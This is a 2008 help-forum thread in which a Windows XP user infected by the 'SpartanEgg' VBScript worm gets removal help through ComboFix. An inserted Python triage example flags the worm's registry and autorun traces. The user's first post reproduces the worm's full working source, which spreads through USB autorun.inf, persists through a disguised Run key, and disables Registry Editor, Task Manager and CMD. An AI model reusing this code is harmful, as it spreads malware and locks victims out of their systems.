SpartanEgg11.log.vbs
donex7
Newbie
25. November 2008 @ 23:57
I don't know what this is (virus, spyware, malware, etc.), but it is on my PC running Windows XP. I first noticed this thing when my KIS7 detected it as a trojan but was not able to quarantine or delete it because it reported that "the file does not exist." Then it prompted me to roll back the action purportedly done by this trojan, and my PC ran normally.

The next day, my son was playing a game on my PC when suddenly it froze. That's when I discovered that the trojan had come back again and was allowed to run by my son (he didn't know, of course, what it was). I checked KIS7 and there I found out that it is Spartanegg11.log.vbs. I ran a full scan but still it remained 'untreated'. So I copied its path and ran WinPE. I ran regedit and deleted every occurrence of spartanegg11.log.vbs. My PC returned to normal... maybe for now. I don't know if I've done the right thing. I hope so. But this I noticed: every time I double-click my drives (C & D) I get a message that spartanegg11.log.vbs is missing and I can't open it this way. Is there a way to fix this? For any help on this, I thank you.

Here's the copy of the SpartanEgg11.log.vbs


'This is just a modified version!
'mabuhay ang Pilipinas!
'Spartan Egg By: Charlie Delta---Bacolod City--April 2008
'Oink...6100 phils.

On Error Resume Next

Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, flashdrive,

fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd

mycmdfile = "cmd.exe"

mydate = month(now())
myvbsalias = "SpartanEgg" & mydate
myvbsfile = myvbsalias & ".log.vbs"

atr = "[autorun]" & vbCrLf & _
"shellexecute=wscript.exe " & myvbsfile

Set fs = CreateObject("Scripting.FileSystemObject")

Dim mf, text, size

Set mf = fs.GetFile(WScript.ScriptFullname)

size = mf.size
check = mf.Drive.drivetype

Set text = mf.openastextstream(1, -2)

Do While Not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbCrLf
Loop

Do
Set winpath = fs.GetSpecialFolder(0)

Set tf = fs.GetFile(winpath & "\" & myvbsfile)

tf.Attributes = 32

Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)

tf.Write mysource
tf.Close

Set tf = fs.GetFile(winpath & "\" & myvbsfile)

tf.Attributes = 39

If (mydate = "12") Then

Set winsyspath = fs.GetSpecialFolder(1)

cmd = "@echo off" & vbCrLf & _
"wscript " & winpath & "\" & myvbsfile

Set tf = fs.GetFile(winsyspath & "\" & mycmdfile)

tf.Attributes = 32

Set tf = fs.CreateTextFile(winsyspath & "\" & mycmdfile, 2)

tf.Write cmd
tf.Close
End If

dim myday
myday = day(now())& hour(now())& minute(now())

if (myday = "131515") Then

msgbox "13th day on 15:15 hr Cracked!?...By: ©Spartan Egg?"
End If

For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And

flashdrive.Path <> "A:" Then
Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

tf.Attributes = 32

Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, 2, True)

tf.Write mysource
tf.Close

Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

tf.Attributes = 39

Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

tf.Attributes = 32

Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2, True)

tf.Write atr
tf.Close

Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

tf.Attributes = 39
End If
Next

Set rg = CreateObject("WScript.Shell")

rg.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di

sableRegistryTools", 1, "REG_DWORD"
rg.RegWrite

"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig",

winpath & "\" & myvbsfile
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main\Window Title", "Hacked By: © Spartan Egg?...6100 phils.!mabuhay

ang Pilipinas!"
rg.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\Di

sableTaskMgr", 1, "REG_DWORD"
rg.RegWrite

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
rg.RegWrite

"HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", 1,

"REG_DWORD"
If check <> 1 Then
WScript.sleep 8000
End If

Loop While (check <> 1)

Set sd = CreateObject("WScript.Shell")


sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname
Senior Member
26. November 2008 @ 04:48
Hey donex7

Now, please download ComboFix.
With ComboFix, at the download window, please rename it to Combo-Fix(.exe) before downloading it. Save it to your Desktop.

Please disable all security programs, such as antiviruses, antispywares, and firewalls.

- Run Combo-Fix.exe and follow the prompts.
- Accept the End-User License Agreement.
- Allow the Recovery Console to be installed.
- When you see the window below, click on Yes.

- When the Recovery Console has been installed, click on Yes to start the scan.

**Understand that things like your system clock changing and your desktop disappearing might happen. Do not worry, because all will be restored later.
- Wait for the scan to be fully completed.
- If it requires a reboot, please do so.
- After the scan has completed entirely, please post the log here. The log will be located at C:\ComboFix(.txt)

Do not click on the ComboFix window, as it may cause it to stall.

Best Regards :D

Life is but a dream; you don't feel any pain unless you want to or you fall off the bed.
Success is relative; the more success the more relatives.
A computer once beat me at chess, but it was no match for me at kickboxing.
To be or not to be; that's a dumb question.

donex7
Newbie
27. November 2008 @ 18:15
Hello cdavfrew,

Thank you for taking the time to help me out of this trouble. I just finished doing what you said. I suspect that I got this SpartanEgg11.log.vbs from my workplace because my flash drive is infected. When I inserted it last night KIS7 detected it once again but still was not able to delete it, but rolled back the action of this virus/malware. I already reformatted my flash drive.

Here's the log of Combofix:

ComboFix 08-11-27.01 - Donex 2008-11-27 22:07:26.1 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1332 [GMT -8:00]
Running from: D:\Malware Tool\Combo-Fix.exe
* Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\autorun.inf
D:\Autorun.inf

.
((((((((((((((((((((((((( Files Created from 2008-10-28 to 2008-11-28 )))))))))))))))))))))))))))))))
.

2008-11-27 22:09 . 2008-11-27 22:10 114 -rahs---- C:\autorun.inf
2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\WINDOWS\SpartanEgg11.log.vbs
2008-11-27 21:07 . 2008-11-27 22:10 7,056 -rahs---- C:\SpartanEgg11.log.vbs
2008-11-26 20:19 . 2008-11-26 20:19 68,096 --a------ C:\WINDOWS\ScUnin.exe
2008-11-26 20:19 . 2008-11-26 20:20 12,265 --a------ C:\WINDOWS\scunin.dat
2008-11-26 20:19 . 2008-11-26 20:19 967 --a------ C:\WINDOWS\ScUnin.pif
2008-11-26 20:18 . 2008-11-27 19:54 <DIR> d-------- C:\Program Files\Starcraft
2008-11-26 08:57 . 2008-11-26 08:57 <DIR> d-------- C:\Program Files\inKline Global
2008-11-26 08:55 . 2008-11-26 08:55 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Media Player Classic
2008-11-26 08:53 . 2008-11-26 08:53 <DIR> d-------- C:\Program Files\Foxit Software
2008-11-26 08:44 . 2008-11-26 08:44 <DIR> d-------- C:\Program Files\K-Lite Codec Pack
2008-11-26 08:34 . 2008-11-26 08:34 <DIR> d--hs---- C:\Diskeeper
2008-11-26 08:23 . 2008-11-26 08:23 <DIR> d-------- C:\Program Files\Diskeeper Corporation
2008-11-26 07:59 . 2008-11-26 08:08 <DIR> d-------- C:\Program Files\Winamp
2008-11-26 07:59 . 2005-12-04 21:12 20,640 --------- C:\WINDOWS\system32\drivers\PxHelp20.sys
2008-11-26 07:55 . 2008-11-26 07:55 <DIR> d-------- C:\WINDOWS\Modio
2008-11-26 07:55 . 2002-01-29 04:28 220,432 -ra------ C:\WINDOWS\system32\drivers\slntamr.sys
2008-11-26 07:55 . 2002-01-29 04:28 220,432 --a--c--- C:\WINDOWS\system32\dllcache\slntamr.sys
2008-11-26 07:55 . 2001-11-29 08:10 33,028 -ra------ C:\WINDOWS\system32\drivers\slwdmsup.sys
2008-11-26 07:55 . 2001-11-29 08:10 33,028 --a--c--- C:\WINDOWS\system32\dllcache\slwdmsup.sys
2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a------ C:\WINDOWS\system32\drivers\MODEMCSA.sys
2008-11-26 07:55 . 2001-08-17 13:57 16,128 --a--c--- C:\WINDOWS\system32\dllcache\modemcsa.sys
2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\ATI
2008-11-25 22:13 . 2008-11-25 22:13 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\ATI
2008-11-25 22:02 . 2008-11-25 22:02 <DIR> d-------- C:\Documents and Settings\Administrator
2008-11-24 21:56 . 2005-04-15 10:58 1,351,392 --a------ C:\WINDOWS\system32\COMCTL32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 1,146,184 --a------ C:\WINDOWS\system32\FM20.DLL
2008-11-24 21:56 . 2005-04-15 10:58 1,071,088 --a------ C:\WINDOWS\system32\MSCOMCTL.OCX
2008-11-24 21:56 . 2007-03-12 07:16 212,240 --a------ C:\WINDOWS\system32\RICHTX32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 152,848 --a------ C:\WINDOWS\system32\COMDLG32.OCX
2008-11-24 21:56 . 2007-03-12 07:16 40,960 --a------ C:\WINDOWS\system32\SSUBTMR6.DLL
2008-11-24 21:56 . 2007-03-12 07:16 32,584 --a------ C:\WINDOWS\system32\FM20ENU.DLL
2008-11-24 21:56 . 2007-03-12 07:16 10,752 --a------ C:\WINDOWS\system32\aamd532.dll
2008-11-24 21:47 . 2008-11-24 21:56 <DIR> d-------- C:\Program Files\AutoPatcher
2008-11-24 21:06 . 2008-11-24 21:57 <DIR> d-------- C:\XP Auto Patcher
2008-11-24 21:03 . 2008-11-24 21:04 <DIR> d-------- C:\XP Drivers
2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a------ C:\WINDOWS\system32\drivers\usbccgp.sys
2008-11-24 14:32 . 2004-08-03 23:08 31,616 --a--c--- C:\WINDOWS\system32\dllcache\usbccgp.sys
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Program Files\Malwarebytes' Anti-Malware
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\Donex\Application Data\Malwarebytes
2008-11-24 14:29 . 2008-11-24 14:29 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2008-11-24 14:29 . 2008-10-22 16:10 38,496 --a------ C:\WINDOWS\system32\drivers\mbamswissarmy.sys
2008-11-24 14:29 . 2008-10-22 16:10 15,504 --a------ C:\WINDOWS\system32\drivers\mbam.sys
2008-11-24 14:26 . 2008-11-24 14:26 <DIR> d-------- C:\WINDOWS\system32\SupportAppXL
2008-11-24 14:26 . 2008-11-26 10:28 <DIR> d-------- C:\Program Files\SMART BRO
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbser6k.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmeaext.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbnmea.sys
2008-11-24 14:26 . 2008-03-18 16:12 105,088 --a------ C:\WINDOWS\system32\drivers\ZTEusbmdm6k.sys
2008-11-24 14:25 . 2004-08-03 23:08 26,496 --a--c--- C:\WINDOWS\system32\dllcache\usbstor.sys
2008-11-24 14:08 . 2008-11-24 14:08 <DIR> d-------- C:\Program Files\Kaspersky Lab
2008-11-24 14:08 . 2008-11-27 19:55 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab
2008-11-24 14:08 . 2008-11-27 22:10 2,406,688 --ahs---- C:\WINDOWS\system32\drivers\fidbox.dat
2008-11-24 14:08 . 2008-11-24 18:11 96,976 --a------ C:\WINDOWS\system32\drivers\klin.dat
2008-11-24 14:08 . 2008-11-24 18:11 87,855 --a------ C:\WINDOWS\system32\drivers\klick.dat
2008-11-24 14:08 . 2008-11-27 22:09 51,488 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.dat
2008-11-24 14:08 . 2008-11-27 22:09 35,276 --ahs---- C:\WINDOWS\system32\drivers\fidbox.idx
2008-11-24 14:08 . 2008-11-27 22:09 6,824 --ahs---- C:\WINDOWS\system32\drivers\fidbox2.idx
2008-11-24 14:07 . 2008-11-24 14:07 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Kaspersky Lab Setup Files

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-11-26 16:57 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-11-25 02:11 112,144 ----a-w C:\WINDOWS\system32\drivers\kl1.sys
2008-11-24 21:42 315,392 ----a-w C:\WINDOWS\HideWin.exe
2008-11-24 21:42 --------- d-----w C:\Program Files\Realtek
2008-11-24 21:40 --------- d-----w C:\Program Files\ATI Technologies
2008-11-24 21:39 --------- d-----w C:\Program Files\Common Files\ATI Technologies
2008-11-24 21:32 --------- d-----w C:\Program Files\Common Files\InstallShield
2008-11-24 21:15 --------- d-----w C:\Program Files\microsoft frontpage
2008-09-16 00:14 3,596,288 ----a-w C:\WINDOWS\system32\qt-dx331.dll
2008-09-16 00:12 81,920 ----a-w C:\WINDOWS\system32\dpl100.dll
2008-09-16 00:11 683,520 ----a-w C:\WINDOWS\system32\divx.dll
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 12:17 61440]
"Malwarebytes' Anti-Malware"="C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe" [2008-10-22 16:10 399504]
"DiskeeperSystray"="C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" [2006-10-04 12:38 163840]
"MSConfig"="C:\WINDOWS\SpartanEgg11.log.vbs" [2008-11-27 22:11 7056]
"AVP"="C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\avp.exe" [2008-02-08 18:36 227856]
"RTHDCPL"="RTHDCPL.EXE" [2008-02-18 23:34 16858112 C:\WINDOWS\RTHDCPL.exe]

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Reboot.exe [2006-12-29 02:35:16 409088]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"= 1 (0x1)
"DisableTaskMgr"= 1 (0x1)

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=

R2 Autorun CDROM Monitor;Autorun CDROM Monitor;C:\WINDOWS\system32\SupportAppXL\cdrom_mon.exe [2008-11-24 14:26:04 81920]
R2 MBAMService;MBAMService;"C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe" [2008-11-24 14:29:16 170640]
R3 AtiHdmiService;ATI Function Driver for HDMI Service;C:\WINDOWS\system32\drivers\AtiHdmi.sys [2008-11-24 13:34:28 84992]
R3 klim5;Kaspersky Anti-Virus NDIS Filter;C:\WINDOWS\system32\DRIVERS\klim5.sys [2007-12-13 13:28:40 24592]
R3 MBAMProtector;MBAMProtector;\??\C:\WINDOWS\system32\drivers\mbam.sys [2008-11-24 14:29:17 15504]
S3 V90drv;v90drv;C:\WINDOWS\system32\DRIVERS\v90drv.sys [2001-11-29 08:10:32 1432836]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}]
\Shell\AutoRun\command - F:\AutoRun.exe
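
The indicators visible in the log above (the `MSConfig` Run entry pointing at a `.vbs` file, `DisableRegistryTools`, `DisableTaskMgr`) and the `autorun.inf` that the posted script writes can be checked for mechanically. This is an added example, not part of the thread or of ComboFix; the function names, finding labels and extension list are assumptions, and the sample inputs are excerpts of text posted in this thread.

```python
import re

# Excerpt of the ComboFix "Reg Loading Points" section posted in this thread.
SAMPLE_LOG = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"DiskeeperSystray"="C:\Program Files\Diskeeper Corporation\Diskeeper\DkIcon.exe" [2006-10-04 12:38 163840]
"MSConfig"="C:\WINDOWS\SpartanEgg11.log.vbs" [2008-11-27 22:11 7056]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools"= 1 (0x1)
"DisableTaskMgr"= 1 (0x1)
'''
# autorun.inf content as the posted script builds it when the month is 11.
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe SpartanEgg11.log.vbs\r\n"

# Policy values the posted script sets to 1 to lock the user out of tools.
LOCKOUT = {"disableregistrytools", "disabletaskmgr", "disablecmd"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")  # assumed extension list
SCRIPT_HOST = re.compile(r"\b[wc]script(\.exe)?\b", re.I)

def reg_values(log_text):
    """Yield (key, name, data) for each "name"=data line under a [key] header."""
    key = None
    for line in map(str.strip, log_text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
        elif key and (m := re.match(r'"([^"]+)"\s*=\s*(.*)', line)):
            yield key, m.group(1), m.group(2)

def as_int(data):
    """Parse '1 (0x1)' or 'dword:00000001'; return None for non-numeric data."""
    m = re.match(r"(?:dword:([0-9a-f]+)|(\d+))", data.strip(), re.I)
    return None if not m else int(m.group(1), 16) if m.group(1) else int(m.group(2))

def triage_registry(log_text):
    """Flag Run entries that start a script file and tool-lockout policies set to 1."""
    findings = []
    for key, name, data in reg_values(log_text):
        path = data.split('"')[1] if data.startswith('"') else ""
        if key.endswith(r"\currentversion\run") and path.lower().endswith(SCRIPT_EXTS):
            findings.append(("run-key-script", name, path))
        elif key.endswith(r"\system") and name.lower() in LOCKOUT and as_int(data) == 1:
            findings.append(("tool-lockout", name, key))
    return findings

def triage_autorun_inf(text):
    """Flag [autorun] launch keys that invoke a script host or a script file."""
    findings, in_autorun = [], False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            in_autorun = line.lower() == "[autorun]"
        elif in_autorun and "=" in line:
            name, _, value = (p.strip().lower() for p in line.partition("="))
            launches = name in ("open", "shellexecute") or name.endswith(r"\command")
            if launches and (SCRIPT_HOST.search(value) or value.endswith(SCRIPT_EXTS)):
                findings.append(("autorun-script", line))
    return findings
```

A Run entry for an ordinary executable (the Diskeeper line in the sample) and an `autorun.inf` that only opens a setup program produce no findings.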
Senior Member
29. November 2008 @ 09:16
Hey donex7

Sorry for the late reply...

Please disable all security programs, such as antiviruses, antispywares, and firewalls.
Also disable your internet connection.


Open Notepad and copy/paste the text in the code box below into it:


File::

C:\autorun.inf
C:\WINDOWS\SpartanEgg11.log.vbs
C:\SpartanEgg11.log.vbs
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Reboot.exe

Registry::
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{aad10dfe-ba74-11dd-b6ff-001e90b232a0}]

- Save this as CFScript.txt in the same folder as ComboFix.
- Then drag the CFScript.txt into Combo-Fix.exe.
- This will start ComboFix again. After reboot (in case it asks to reboot), post the ComboFix log here. The log will be located at C:\ComboFix(.txt).

Do not click on the ComboFix window, as it may cause it to stall.



Any more problems?

Best Regards :D


donex7
Newbie
30. November 2008 @ 16:37
To cdavfrew,

My PC is clean now after I've done all that you said. I did not bother to post the log here anymore as it only reported it deleted Spartanegg11.log.vbs in Drive C, C\WINDOWS, also deleted Reboot.exe and the mountpoints2 autorun... that's all.

I've tried to access the following: run command, task manager, DOS, and yes, I can already access all of them, which I was not able to when Spartanegg11.log.vbs was still in command. I can also reset the attributes of the folders/files now to hidden or shown... before it was always hidden.

And most of all, my PC speed has returned to normal. No more freezing/delaying time. Now what can I say? It's a big, big thanks to you..

My best regards..
Senior Member
30. November 2008 @ 22:37
Hey donex7

Glad to hear that your problem is fixed, and there's really no need for the ComboFix log anymore.

However, I'd like you to follow one final instruction:

Find this folder, C:\Qoobox, zip it up, and upload it to http://www.uploadmalware.com/

Best Regards :D


donex7
Newbie
11. December 2008 @ 23:37
To cdavfre,

Sorry for the delayed response. Just want to thank you again and to let you know that I've already uploaded the requested file to the link you provided.

All the best..